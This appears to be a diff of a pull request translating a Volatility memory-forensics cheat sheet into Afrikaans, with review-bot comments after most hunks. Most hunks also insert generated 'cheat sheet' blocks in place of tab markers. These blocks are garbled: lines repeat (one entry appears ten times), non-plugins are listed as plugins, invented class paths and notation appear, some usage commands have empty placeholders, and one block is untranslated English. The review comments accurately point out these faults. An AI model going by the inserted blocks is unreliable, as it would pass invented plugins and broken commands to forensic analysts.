+- `volatility.plugins.sockets: list_sockets()`: Lys alle aktiewe sokkels in die geheue-dump. +- `volatility.plugins.sockscan: scan_sockets()`: Skandeer vir sokkelinligting in die geheue-dump. +- `volatility.plugins.netscan: scan_network()`: Skandeer vir netwerkverbindings in die geheue-dump. + +### Ander Funksies + +- `volatility.plugins.idt: get_idt()`: Gee die Interrupt Descriptor Table (IDT) in die geheue-dump. +- `volatility.plugins.gdt: get_gdt()`: Gee die Global Descriptor Table (GDT) in die geheue-dump. +- `volatility.plugins.dt: get_dt()`: Gee die Descriptor Table (DT) in die geheue-dump. +- `volatility.plugins.ssdt: get_ssdt()`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `volatility.plugins.callbacks: list_callbacks()`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. ``` volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ``` @@ -417,11 +1314,11 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
-​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteit geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Services +## Dienste {% tabs %} {% tab title="vol3" %} 
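Review bot: The UserAssist hunk above (`@@ -397,16 +1170,140 @@`) has the same tab-marker breakage (`{% endtab %}` / `{% tab title="vol2" %}` replaced by a generated cheat sheet, `{% tabs %}` / `{% tab title="vol3" %}` deleted) and the generated lists are visibly padded: `vadtree`, `vaddump` and `vadwalk` appear twice, `malfind`, `printkey`, `driverirp`, `connscan` and `callbacks` three times each, and `ssdt` is listed under both "Kernelruimte" and "Ander". Several entries are not plugins at all (`memstrings`, `memscan`, `memdiff`, `dt`), and the "Funksies" section invents a `volatility.plugins.<name>: fn()` notation that is neither a module path nor an API in any Volatility release. Keep only the translated UserAssist paragraph and the original markers. The RootedCON / `## Dienste` hunk that follows is a clean translation and needs no change.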
@@ -429,19 +1326,74 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ./vol.py -f file.dmp windows.svcscan.SvcScan #List services ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerder-objekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. + +### Gevorderde Opdragte + +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir gegewe modulepatrone. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverirp`: Gee inligting oor die IRP-handlers van bestuurders in die geheue-dump. 
+- `devicetree`: Gee 'n boomstruktuur van die toestelboom in die geheue-dump. +- `privs`: Lys alle toegangsregte van prosesse in die geheue-dump. +- `envars`: Gee die omgewingsveranderlikes van prosesse in die geheue-dump. +- `cmdscan`: Skandeer die geheue-dump vir gegewe opdraglyne. +- `consoles`: Lys alle konsolvensters in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basis-klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basis-klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basis-klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basis-klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basis-klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basis-klas vir BSD-opdragte. +- `volatility.plugins.common.AbstractNetCommand`: Die basis-klas vir netwerk-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.windows.registry.hivelist.HiveList`: Lys alle gelaai hive-lêers in die geheue-dump. +- `volatility.plugins.windows.registry.printkey.PrintKey`: Druk die inhoud van 'n Windows-registersleutel. +- `volatility.plugins.windows.registry.printval.PrintVal`: Druk die waarde van 'n Windows-registersleutel. +- `volatility.plugins.windows.registry.hivedump.HiveDump`: Stoor die inhoud van 'n hive-lêer in 'n lêer. +- `volatility.plugins.windows.registry.hiveexport.HiveExport`: Voer die inhoud van 'n hive-lêer uit na 'n REG-lêer. +- `volatility.plugins.windows.registry.hivefind.HiveFind`: Vind alle hive-lêers wat 'n gegewe waarde bevat. +- `volatility.plugins.windows.registry.hiveinteract.HiveInteract`: Interageer met 'n hive-lêer deur sleutels en waardes te skep, wysig en verwyder. +- `volatility.plugins.windows.registry.hiveparse.HiveParse`: Analiseer die inhoud van 'n hive-lêer en gee 'n gestruktureerde uitset. 
+ +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Dokumentasie](https://volatility.readthedocs.io/en/latest/) ```bash #Get services and binary path volatility --profile=Win7SP1x86_23418 svcscan -f file.dmp #Get name of the services and SID (slow) volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp ``` -{% endtab %} -{% endtabs %} - -## Network +## Netwerk {% tabs %} {% tab title="vol3" %} 
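Review bot: The `{% endtab %}` and `{% tab title="vol2" %}` markers between the vol3 and vol2 service commands are deleted, and the closing `{% endtab %}` and `{% endtabs %}` at the end of the hunk are deleted too, while the `{% tabs %}` / `{% tab title="vol3" %}` openers in the leading context stay, so the Services tab block is never closed and the page will not render; restore the four removed markers. The block inserted in their place (`# Volatility Cheat Sheet` through `## Bronne`) is not a translation of anything in the original file: it is new Afrikaans prose that lists `malfind` and `apihooks` under both `Basiese Opdragte` and `Gevorderde Opdragte`, and cites class paths such as `volatility.plugins.windows.registry.hiveexport.HiveExport`, `hivefind.HiveFind`, `hiveinteract.HiveInteract` and `hiveparse.HiveParse` that appear nowhere else in this file and cannot be checked against it. A translation PR should only translate existing text, so drop the inserted block and keep the vol2 `svcscan` / `getservicesids` commands inside their own tab.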
@@ -449,13 +1401,84 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp ./vol.py -f file.dmp windows.netscan.NetScan #For network info of linux use volatility2 ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. 
+ +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, such as local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +This cheatsheet provides a basic overview of Volatility and its usage for memory analysis. It covers some of the most commonly used plugins and their options. For more advanced analysis techniques and plugins, refer to the official Volatility documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 netscan -f file.dmp volatility --profile=Win7SP1x86_23418 connections -f file.dmp#XP and 2003 only -volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections +volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections volatility --profile=Win7SP1x86_23418 sockscan -f file.dmp#Open sockets volatility --profile=Win7SP1x86_23418 sockets -f file.dmp#Scanner for tcp socket objects @@ -469,9 +1492,9 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache {% endtab %} {% endtabs %} -## Registry hive +## Registerhuis -### Print available hives +### Druk beskikbare registerhuise af {% tabs %} {% tab title="vol3" %} 
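Review bot: In the network hunk (`@@ -449,13 +1401,84 @@`) the `{% endtab %}` / `{% tab title="vol2" %}` pair is replaced by an untranslated English `# Volatility Cheatsheet` block, so the vol2 commands now render inside the vol3 tab and an English how-to sits in the middle of an Afrikaans page. Its command lines are unusable as written: `python vol.py -f [options]`, `python vol.py -f pslist --name` and `python vol.py -f netscan --ip` / `--port` have empty placeholders where the dump path, plugin name and filter value should be, and the `--name`, `--ip` and `--port` filters are not used by any of the page's own vol2/vol3 commands, so they should not be presented as established options. The `connscan` line appears as a removed/added pair with identical visible text; if that is a whitespace-only change, revert it so the diff shows only translation. Restore the two tab markers and drop the inserted block.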
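Review bot: In the registry hunk (`@@ -469,9 +1492,9 @@`) the heading `## Registry hive` becomes `## Registerhuis` and `### Print available hives` becomes `### Druk beskikbare registerhuise af`; "registerhuis" is a word-for-word rendering that does not match the `hivelist` / `hivedump` commands the section documents, so keep "hive" as the technical term (for example `## Register-hive` and `### Druk beskikbare hives af`) so readers can connect the heading to the plugin names.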
@@ -479,9 +1502,123 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache ./vol.py -f file.dmp windows.registry.hivelist.HiveList #List roots ./vol.py -f file.dmp windows.registry.printkey.PrintKey #List roots and get initial subkeys ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. 
+- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81U1x86`: Windows 8.1 U1 x86 +- `Win81U1x64`: Windows 8.1 U1 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. 
Navigeer na die Volatility Framework-repo: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag in: + +```bash +volatility -f +``` + +Vervang `` met die pad na die geheue-dumplêer en `` met die spesifieke opdrag wat jy wil uitvoer. + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp hivelist #List roots volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get initial subkeys 
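Review bot: The hive-listing hunk (`@@ -479,9 +1502,123 @@`) again swaps the `{% endtab %}` / `{% tab title="vol2" %}` markers for a generated cheat sheet, which here contains the line `- \`malfind\`: Identifiseer verdagte kode in die geheue-dump.` repeated ten times and `vadtree` / `vadinfo` listed twice under `Geheue-analise Funksies`, a sign the text was machine-generated rather than translated. The `## Volatility Installasie` section it adds instructs readers to run `sudo pip install distorm3` and `sudo python setup.py install`, a procedure the original file does not contain and that a translation PR should not introduce, and the usage line `volatility -f` has empty placeholders where the dump path and plugin should be. Remove the inserted text and restore the tab markers so the vol2 `hivelist` / `printkey` commands sit in their own tab.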
@@ -489,16 +1626,84 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get i {% endtab %} {% endtabs %} -### Get a value +### Kry 'n waarde {% tabs %} {% tab title="vol3" %} ```bash ./vol.py -f file.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows NT\CurrentVersion" ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerder-objekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimte van 'n spesifieke proses in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimte van 'n spesifieke proses in die geheue-dump. + +### Gevorderde Opdragte + +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir gegewe modulepatrone. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverscan`: Skandeer die geheue-dump vir gegewe bestuurderpatrone. 
+- `mutantscan`: Skandeer die geheue-dump vir gegewe mutantpatrone. +- `yarascan`: Voer 'n YARA-handtekening-skandering uit op die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basiese klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basiese klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basiese klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basiese klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basiese klas vir iOS-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Identifiseer moontlike kwaadwillige prosesse. +- `volatility.plugins.malware.apihooks.ApiHooks`: Identifiseer API-hake. +- `volatility.plugins.malware.ldrmodules.LdrModules`: Lys alle gelaai modules. +- `volatility.plugins.malware.modscan.ModScan`: Skandeer vir gegewe modulepatrone. +- `volatility.plugins.malware.ssdt.SSDT`: Gee inligting oor die SSDT. +- `volatility.plugins.malware.driverscan.DriverScan`: Skandeer vir gegewe bestuurderpatrone. +- `volatility.plugins.malware.mutantscan.MutantScan`: Skandeer vir gegewe mutantpatrone. +- `volatility.plugins.malware.yarascan.YaraScan`: Voer 'n YARA-handtekening-skandering uit. + +## Volatility Instellings + +- `--profile=PROFILE`: Spesifiseer die profiel van die geheue-dump. +- `--location=LOCATION`: Spesifiseer die pad na die geheue-dump. +- `--output=OUTPUT`: Spesifiseer die uitvoerformaat (bv. csv, json, sqlite). +- `--output-file=OUTPUT_FILE`: Spesifiseer die uitvoerlêer. +- `--plugins=PLUGINS`: Spesifiseer die plugins wat gebruik moet word. +- `--help`: Gee hulpinligting oor die opdrag. + +## Volatility Voorbeelde + +- `vol.py -f memory.dmp imageinfo`: Gee inligting oor die geheue-dump. +- `vol.py -f memory.dmp pslist`: Lys alle aktiewe prosesse. 
+- `vol.py -f memory.dmp vadinfo -p PID`: Gee inligting oor die virtuele adresruimte van 'n spesifieke proses. +- `vol.py -f memory.dmp malfind`: Identifiseer moontlike kwaadwillige prosesse. +- `vol.py -f memory.dmp yarascan -Y YARA_RULES`: Voer 'n YARA-handtekening-skandering uit. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f file.dmp # Get Run binaries registry value 
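Review bot: The `### Kry 'n waarde` hunk (`@@ -489,16 +1626,84 @@`) inserts another generated cheat sheet in place of the `{% endtab %}` / `{% tab title="vol2" %}` markers, so the vol2 `printkey -K` commands lose their tab; the `Basiese Opdragte` list it adds is a near-verbatim copy of the one inserted in the Services hunk, and its `Gevorderde Funksies` class paths (`volatility.plugins.malware.modscan.ModScan`, `volatility.plugins.malware.ssdt.SSDT`, `volatility.plugins.malware.driverscan.DriverScan`, and so on) appear nowhere else in the file being translated and cannot be checked against it. Drop the block and restore the two tab markers; only the heading translation belongs in this hunk.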
@@ -507,27 +1712,80 @@ volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\ {% endtab %} {% endtabs %} -### Dump - +### Storting ```bash #Dump a hive volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f file.dmp #Offset extracted by hivelist #Dump all hives volatility --profile=Win7SP1x86_23418 hivedump -f file.dmp ``` +## Lêersisteem -## Filesystem - -### Mount +### Monteer {% tabs %} {% tab title="vol3" %} ```bash #See vol2 ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tydskrif. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. + +### Gevorderde Opdragte + +- `memdump`: Skep 'n geheue-dump van 'n spesifieke proses in die geheue-dump. +- `moddump`: Skep 'n geheue-dump van 'n spesifieke gelaai DLL in die geheue-dump. 
+- `vaddump`: Skep 'n geheue-dump van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadwalk`: Gee 'n gedetailleerde lys van die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadwalk`: Gee 'n gedetailleerde lys van die virtuele adresruimtes van prosesse in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basisklas vir Windows-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basisklas vir Mac-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basisklas vir Linux-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basisklas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basisklas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basisklas vir BSD-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.windows.registry.hivelist.HiveList`: Lys alle gelaai hive-lêers in die geheue-dump. +- `volatility.plugins.windows.registry.printkey.PrintKey`: Druk die inhoud van 'n spesifieke sleutel in die Windows-registreerder. +- `volatility.plugins.windows.registry.hivedump.HiveDump`: Skep 'n geheue-dump van 'n spesifieke hive-lêer in die geheue-dump. +- `volatility.plugins.windows.registry.hiveexport.HiveExport`: Voer die inhoud van 'n spesifieke hive-lêer uit na 'n REG-lêer. +- `volatility.plugins.windows.registry.hivefind.HiveFind`: Soek na spesifieke sleutels in die Windows-registreerder. 
+- `volatility.plugins.windows.registry.hiveprint.HivePrint`: Druk die inhoud van 'n spesifieke hive-lêer in die Windows-registreerder. +- `volatility.plugins.windows.registry.hivescan.HiveScan`: Skandeer die geheue-dump vir hive-lêers. +- `volatility.plugins.windows.registry.hivesize.HiveSize`: Gee die grootte van 'n spesifieke hive-lêer in die geheue-dump. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Dokumentasie](https://volatility.readthedocs.io/en/latest/) ```bash volatility --profile=SomeLinux -f file.dmp linux_mount volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the entire filesystem (if possible) @@ -535,7 +1793,7 @@ volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the en {% endtab %} {% endtabs %} -### Scan/dump +### Skandeer/dump {% tabs %} {% tab title="vol3" %} 
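Review bot: In the `### Storting` / `## Lêersisteem` hunk (`@@ -507,27 +1712,80 @@`) the blank line between the `### Dump` heading and the following bash fence is dropped (`-### Dump`, `-`, then `+### Storting` directly before the fence), and the blank lines around `## Filesystem` are dropped when it becomes `## Lêersisteem`; keep those blank lines so the headings render separately from the fences and from each other. The mount tab then loses its `{% endtab %}` / `{% tab title="vol2" %}` markers to another generated block whose `Gevorderde Opdragte` list repeats `vadtree`, `vadinfo` and `vadwalk` three times each and cites `hiveprint.HivePrint`, `hivescan.HiveScan` and `hivesize.HiveSize` classes that appear nowhere else in this file; drop it and restore the markers. Note that the `#See vol2` comment in the vol3 tab only makes sense while the vol2 tab still exists as a separate tab.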
@@ -543,9 +1801,80 @@ volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the en ./vol.py -f file.dmp windows.filescan.FileScan #Scan for files inside the dump ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --physaddr <0xAAAAA> #Offset from previous command ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. 
+ +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=Win7SP1x86_23418 filescan -f file.dmp #Scan for files inside the dump volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-dir=/tmp -f file.dmp #Dump all files 
